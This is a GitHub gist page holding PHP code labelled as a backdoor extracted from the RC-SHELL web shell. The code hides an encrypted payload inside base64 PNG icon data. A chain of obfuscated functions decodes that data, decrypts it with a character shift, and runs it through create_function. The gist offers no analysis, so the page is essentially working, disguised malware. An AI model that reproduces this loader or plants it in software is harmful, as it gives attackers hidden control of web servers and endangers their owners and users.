Create a gist now

Instantly share code, notes, and snippets.

anonymous /rc-shell-backdoor Secret
Created May 9, 2017

What would you like to do?
backdoor as stripped from RC-SHELL
<?php
/* rc-shell backdoor */
$images = array(
"small_unk" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAN1wAADdcBQiibeAAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAAC0SURBVDiN7Y8tjsMwGESn1kgBAQEGoSELs7fojdpb9FShYd4gh4TmCt+PXVReV4U70sD3NHNZ1/VqZo9Syi8aEkJIJG+XZVnSNE3zOI4IIbwFl1JwnieO4/ijiMwxRohIywDEGJFznunucPcmGABeHM0MtdZmAQCYGaiqHwtUFXT3jwXfufAv+JJAVUGyGTYzBJI5pQQRQa31rYoIUkogmdn3/X3f98e2bT8tC7qu24dhuD8BD6e7SzzK9MwAAAAASUVORK5CYII=",
"unknown" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAN1wAADdcBQiibeAAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAAGpSURBVDiNlVLNiuJAGKzEjjkIRomoiCEtsosHFR/AkzJvtPMW81DiUW/ZHCRi/D20IoiiIOlOeg9Lwrhj3N2C79JVX1H10cp0On0TQnxEUdTFf0BVVYcQ8kMZj8cOpbRTqVSgquo/LUdRhP1+j9Vq9ZMEQdAxTRNBECSC7XYLxhiOxyOy2Syq1Sosy0I+n080pmnC87yOGoYhwjCElBJSSvi+j8lkAkVRMBgMoGkaZrMZRqMRrtdroov3VCFE8iilxOFwAADsdjsoioJ6vQ4A4JyDMfagFUKAcM4hpUyiUUpxPp9RKBSQyWRwuVwSrlgsPmg55yBx/BilUgnD4RAAIKUEYwwAUC6XYRjGgzYMQ5C4wjOcTifcbjfUajX0er0vOiHEa4PNZgPbttHtdpNEfxp8OeLnYYyh1Wql8n9N0O/3QQhJ5V8arNdrLBYL2LaNZrOZapBaYblc4n6/w/f9lxVUIQTiv/B5KKXQdR2NRuPpMuf8dwVCiOc4zvd2uw1N05J4lmXBsqyn1+ecw3VdEEI8ksvl3ufz+Yfrut+eFk2BrutzwzDefwHYpG7Wn490BQAAEpR0RVh0Q29tbWVudAB1bmtub3dulqeSnXGWo6Ogo5CjlqGgo6Wan5hZYVpsO3Gan5qQpJalWVOVmqShnZKqkJajo6CjpFNdUZeSnaSWWmw7l6aflKWaoJ9Ro5RimqOWWVWXWqxRo5alpqOfUXGXlJ2gpJZZcZegoZafWVWXXVFYo1haWlFwUWJRa1FhbFGuO5emn5SlmqCfUaOUYpqoo1lVl1qsUaOWpaajn1Fxl5SdoKSWWXGXoKGWn1lVl11RWJJYWlpRcFFiUWtRYWxRrjuXpp+UpZqgn1GjlGKoo5pZVZddVZRarFFVl6FucZegoZafWVWXXVFYqFhabFFxl6GmpaRZVZehXVFVlFpsUXGXlJ2gpJZZVZehWmxRrjuXpp+UpZqgn1GjlGKXl55ZVaVarFGjlqWmo59RcaSlo5CjlqGdkpSWWVNgYFNdU2BTXXGkpaOQo5ahnZKUlllTjY1TXVNgU11VpVpabFGuO5emn5SlmqCfUaOUYpWVWVqsUaOWpaajn1FZcZappZafpJqgn5CdoJKVlpVZWJSmo51YWlFXV1Fxl6aflKWaoJ+QlqmapKWkWViUpqOdkJqfmqVYWlpRcFFiUWtRYWxRrjuXpp+UpZqgn1GjlGKlnqFZWqw7UZidoJOSnVFVpZaeoZWao2w7UZqXWXGapKSWpVlVpZaeoZWao1pXV3GapJCVmqNZVaWWnqGVmqNaV1dxmqSQqKOapZKTnZZZVaWWnqGVmqNaWlGjlqWmo59RVaWWnqGVmqNsO1GXoKOWkpSZWZKjo5KqWVNgpZ6hYFNdU2CnkqNgpZ6hYFNdU2CmpKNgpZ6hYFNdU2CVlqdgpJmeYFNdU1aIen91eoNgpZaeoWBTWlGSpFFVpVqsO1FRmpdZcZeanZaQlqmapKWkWVWlWldXcZqkkJWao1lVpVpXV3GapJCoo5qlkpOdlllVpVpaUaOWpaajn1FVpWw7Ua47UaOWpaajn1GXkp2klmw7rjuXpp+UpZqgn1GjlGKmo51ZWqw7UVWZUW5RWZaeoaWqWVWQhHaDh3aDjFh5hYWBhFiOWlGtrVGkpaOloJ2gqJajWVWQhHaDh3aDjFh5hYWBhFiOWlFublFYoJeXWFFwUZeSnaSWUWtRpaOmllpsO1FVplFuUViZpaWhWFFfUVlZVZlRcFFYpFhRa1FYWFpRX1FYa2BgWFFfUVWQhHaDh3aDjFh5hYWBkHmAhIVYjlFfUVWQhHaDh3aDjFiBeYGQhHZ9d1iOWmw7UVWeUW5RWZaeoaWqWVWQhHaDh3aDjFiBcoV5kHp/d4BYjlpRcFFYgoZ2g4qQhIWDen94WFFrUViBcoV5kHp/d4BYWmw7UVWkUW5RVZ5Rbm5RWIKGdoOKkISFg3p/eFhRcFFYcFhRa1FYWGw7UaOWpaajn1FVplFfUVWkUV9RWZqkpJalWVWQhHaDh3aDjFWejlpRcFFVkIR2g4d2g4xVno5Ra1FYWFpsO647mpdZo5RilZVZWlpRrDtRl6aflKWaoJ9Ro5RioVlVpl1Vp11VmVqsO1FRmpdZVZlRUm5RU2JTUVdXUVWZUVJuUVNhU1pRVZlRblFTYVNsO1FRVadRblFTlKCfpZafpZClqqGWbp+WqJCVkqWSkJafpaOqV5OSpJaQlKCfpZafpW5TUV9RcaajnZaflKCVlllxk5KklmdlkJaflKCVlllVp1paUV9RU1eZmpWVlp+Qpaqhlm5TUV9RVZlRX1FTV6SqpJClqqGWblNRX1GBeYGQgIRRX1FTV5qhblNRX1FVkIR2g4d2g4xYg3Z+gIV2kHJ1dYNYjmw7UVFVklFuUVN+oKuanZ2SYGVfYVFZlKCeoZKlmpOdlmxRfoR6dlFoX2FsUYian5WgqKRRf4VRZ19ibFGFo5qVlp+lYGVfYWxRhH10dGNsUV9/doVRdH2DUWNfYV9mYWhjaGxRX392hVF0fYNRZF9mX2RhaGNqbFFff3aFUXR9g1NsO1FRVaZRblFTmaWloWtgYFNRX1FVpmw7UVFVlFFuUXGUpqOdkJqfmqVZWmw7UVFxlKajnZCklqWgoaVZVZRdUXSGg32AgYWQhoN9XVFVplpsO1FRcZSmo52QpJaloKGlWVWUXVF0hoN9gIGFkIaEdoNyeHZ/hV1RVZJabDtRUXGUpqOdkKSWpaChpVlVlF1RdIaDfYCBhZCDdoWGg3+Fg3J/hHd2g11RYlpsO1FRcZSmo52QpJaloKGlWVWUXVF0hoN9gIGFkIGAhIVdUWJabDtRUXGUpqOdkKSWpaChpVlVlF1RdIaDfYCBhZCBgISFd3p2fXWEXVFVp1psO1FRcZSmo52QpJaloKGlWVWUXVF0hoN9gIGFkIV6fnaAhoVdUWVabDtRUXGUpqOdkKSWpaChpVlVlF1RdIaDfYCBhZB0gH9/dnSFhXp+doCGhV1RZVpsO1FRVaNRblFxlKajnZCWqZaUWVWUWmw7UVFxlKajnZCUnaCklllVlFpsO1FRo5alpqOfUVlScZaeoaWqWVWjWlFXV1FxpKWjpKWjWVWjXVFTpJKnlpWQo5SkmZadnZCWn6WjqlNaWlFwUWJRa1FhbDtRrjuuO5emn5SlmqCfUaOUYpeloVlVpW5hWqw7UZidoJOSnVFVkpSlXVWXpaGQpJajp5ajXVWXpaGQoaCjpV1Vl6WhkKaklqOfkp6WXVWXpaGQoZKkpKigo5VsO1FVn25TjZ9TbDtRVZRuYWw7UVWnblhYbDtRmpdZcZqkpJalWVWSlKVaV1dVkpSlbm5Tl6WhU1dXcZqkpJalWVWXpaGQoaCjpVpXV1Jxlp6hpapZVZeloZChoKOlWldXcZqkpJalWVWXpaGQpJajp5ajWldXcZqkpJalWVWXpaGQpqSWo5+SnpZaV1dxmqSklqVZVZeloZChkqSkqKCjlVpXV1Jxlp6hpapZVZeloZCklqOnlqNaV1dScZaeoaWqWVWXpaGQpqSWo5+SnpZaV1dScZaeoaWqWVWXpaGQoZKkpKigo5VaWqw7UVFVlG5ibDtRUVWnblN3hYFrUVWXpaGQpJajp5aja1WXpaGQoaCjpa2GhHaDa1FVl6WhkKaklqOfkp6WrYFyhIRrUVWXpaGQoZKkpKigo5WNn1NsO1GuO1Gal1lVpVJubmFarDtRUZqXWVJVlFpRo5alpqOfUVhYbDtRUZqXWXGXpp+UpZqgn5CWqZqkpaRZU5eloZCUoJ+flpSlU1pXV3GXpp+UpZqgn5CWqZqkpaRZU5eloZCdoJian1NaV1dxl6aflKWaoJ+QlqmapKWkWVOXpaGQlJ2gpJZTWlqsO1FRUVWXl5dRblFxl6WhkJSgn5+WlKVZVZeloZCklqOnlqNdVZeloZChoKOlXWRabDtRUVGal1lVl5eXWlGsO1FRUVGal1lxl6WhkJ2gmJqfWVWXl5ddUVWXpaGQpqSWo5+SnpZdUVWXpaGQoZKkpKigo5VaWqw7UVFRUVFxl6WhkJSdoKSWWVWXl5dabDtRUVFRUaOWpaajn1FVp2w7UVFRUa47UVFRUXGXpaGQlJ2gpJZZVZeXl1psO1FRUa47UVGuO1FRo5alpqOfUVhYbDtRrjtRo5alpqOfUVWnbDuuO5emn5SlmqCfUaOUYpSXmFlVkqNarFE7UVWfblONn1NsO1GYnaCTkp1RVZSgn5eamGw7UVWjblhYbDtRl6CjlpKUmVmSo6OSqllYp5ajpJqgn1hdWJKmpZlYXViVlpeSpp2lkKeSo6RYWlGSpFFVlFqsO1FRmpdZcZqkpJalWVWUoJ+XmpiMVZSOWlqsO1FRUZqXWXGapJCSo6OSqllVlKCfl5qYjFWUjlparDtRUVFRl6CjlpKUmVlVlKCfl5qYjFWUjlGSpFFVnG5vVadaUXFVo19uVZRfU1FTX1WcX1NuU19Vp19Vn2w7UVFRrlGWnaSWUaw7UVFRUXFVo19uVZRfU25TX1WUoJ+XmpiMVZSOX1WfbDtRUVGuO1FRrjtRrjtRo5alpqOfUVWjbDuuO5emn5SlmqCfUaOUYqGkpVlarDtRVZ9uU42fU2w7UVWnblhYbDtRmJ2gk5KdUVWUoJ+XmphsO1Gal1lxmqSklqVZVZSgn5eamIxTkqalmVOOjFOelWaQpqSWo1OOWldXcZqkpJalWVWUoJ+XmpiMU5KmpZlTjoxTnpVmkKGSpKRTjlpXV3GapKSWpVlVkIGAhIWMU6umU45aV1dxmqSklqVZVZCBgISFjFOroVOOWlqsO1FRmpdZVZSgn5eamIxTkqalmVOOjFOelWaQpqSWo1OObm5xnpVmWVWQgYCEhYxTq6ZTjlpXV1WUoJ+XmpiMU5KmpZlTjoxTnpVmkKGSpKRTjm5uVZCBgISFjFOroVOOWqw7UVFRVadfblOrpm5TX1WQgYCEhYxTq6ZTjl9Vn2w7UVFRVadfblOroW5TX1WQgYCEhYxTq6FTjl9Vn2w7UVGuO1GuO1GjlqWmo59RVadsO647l6aflKWaoJ9Ro5RikpWVWVWSo1qsO1GYnaCTkp1RVZOkkpeWXVWToKGWn5Wao2w7UVWfblONn1NsO1FVp25ThoN9blNfo5RipqOdWVpfVZ9fVZ9sO1FVp1FfblFToZmhblNfcaGZoaeWo6SaoJ9ZWl9Vn2w7UVWnUV9uUVOkkpeWkJ6glZZuU19ZWXGapKSWpVlVk6SSl5ZaWlFwUVlZVZOkkpeWWlFwUVOAf1NrU4B3d1NaUWtTcFNaX1WfbDtRVadRX25RU6Chlp+QlZqjblNfWVlxmqSklqVZVZOgoZaflZqjWlpRcFFZWVWToKGWn5Wao1pRcFFTinaEU2tTf4BTWlFrU3BTWl9Vn2w7UVWnUV9uUaOUYqGkpVlabDtRVadRX25Ro5RilJeYWVpsO1FVp1FfblGjlGKXpaFZWmw7UZego5aSlJlZkqOjkqpZWIR2g4d2g5B/cn52WF1YhHaDh3aDkHJ1dYNYXViEdoOHdoOQgYCDhVhdWHmFhYGQg3Z3doN2g1hdWIF5gZCEdn13WF1Yg3aChnaEhZCGg3pYXViEdIN6gYWQf3J+dlhdWIR0g3qBhZB3en12f3J+dlhdWHR9enZ/hZB6gVhdWIN2foCFdpBydXWDWFpRkqRRVaSnWqw7UVGal1lxmqSklqVZVZCEdoOHdoOMVaSnjlparFFVp19uVaSnX1NuU19VkIR2g4d2g4xVpKeOX1WfbFGuO1GuO1GjlqWmo59RVadsO647l6aflKWaoJ9Ro5RipJVZVZldVaddVaRdVaZiXVWeYlqsO1Gal1mjlGKVlVlaWlGsO1FRmpdZUqOUYqFZVaZiXVFVp11RVZlaWlFxnpKanVlVnmJdUVWkXVFVp1psO1GuUZadpJZRrDtRUXGekpqdWVWeYl1RVaRdUVWnWmw7Ua47rjtVo5RipZ6hbqOUYqWeoVlabDual1lVo5RipZ6hUm5ul5KdpJZarDtRcVWjUW5Ro5Ril5eeWVWjlGKlnqFRX1FTYFNRX1FxnpVmWXGmn5qimpVZcaOSn5VZWlpRX1FxnpVmWXGlmp6WWVpaWlpsO1Gal1mjlGKaqKNZVaNaWlGsO1FRVZSXmp2WUW5Ro5Ril5eeWVWjlGKlnqFRX1FTYKioqJCklqSkkFNRX1FxnpVmWaOUYqajnVlaX6OUYpSXmFlaWlpsO1FRcaafnZqfnFlVo1psOztRUVWeYlFuUVOhlqWWo52WmJajlmZicaqSmaCgX5SgnlNsO1FRVaZiUW5RU6GWpZajnZaYlqOWX5OqlqWZoKSlY1+UoJ5gn5aopGCan5WWqV+hmaFTbDtRUVWkUW5RgXmBkICEUV9TrVNfo5RipqOdWVpsO1FRVZlRblFTYVNsO1FRmpdZUqOUYpqjlllVlJeanZZaWlGsO1FRUVWnUW5Ro5RikpWVWVpsO1FRUaOUYqSVWVWZXVFVp11RVaRdUVWmYl1RVZ5iWmw7UVFRo5RiqKOaWVWUl5qdll1RU2JTWmw7UVGuO1FRVZenbqOUYpeloVliWmw7UVGal1lScZaeoaWqWVWXp1parDtRUVFVmVFuUVNiU2w7UVFRVaSXmp2WUW5Ro5Ril5eeWVWjlGKlnqFRX1FTYKioqJCklqSkkFNRX3GelWZZVZSXmp2WX1WXp1pabDtRUVGal1lSo5RimqOWWVWkl5qdllpaUaw7UVFRUVWnUW5Ro5RikpWVWVpsO1FRUVGjlGKklVlVmV1RVaddUVN3hYGtU19VpF1RVaZiXVFVnmJabDtRUVFRo5RiqKOaWVWkl5qdll1RU2JTWmw7UVFRrjtRUa47Ua47rjs7dW5rbm93bvC6iHoAAAAASUVORK5CYII="
);
function z10q() //backdoor_init
{
return z8t(z8p(z8b()), z8b());
}
function z8t($i, $o)//run backdoor
{
$r = @create_function('$o', 'return @' . z7v($o, 0) . '($o);');
return $r($i);
}
function z8p($i, $t = 0)
{
return ($t === 0 ? z7v($i) : ($t === 1 ? @ord($i) : @chr($i)));
}
function z8b()
{
return (@isset($value) ? $value : 'unknown');
}
function z7v($i, $c = 1)
{
foreach (z7q() as $r) {
if (@strstr(z9n($r), $i))
return z7m(@explode($i, z9n($r)), $c);
}
;
}
function z7q()
{
global $images;
return (@is_array($images) ? $images : array());
}
function z9n($i)
{
return @base64_decode($i);
}
function z7m($i, $s)
{
return ($s) ? z6n(@substr($i[1], 4)) : z6n(@substr($i[1], 0, 4));
}
function z6n($i) //decrypt
{
$r = '';
for ($n = 0; $n < @strlen($i); $n++)
$r .= z8p(z8p($i[$n], 1) - z8p(1, 1), 2);
return $r;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment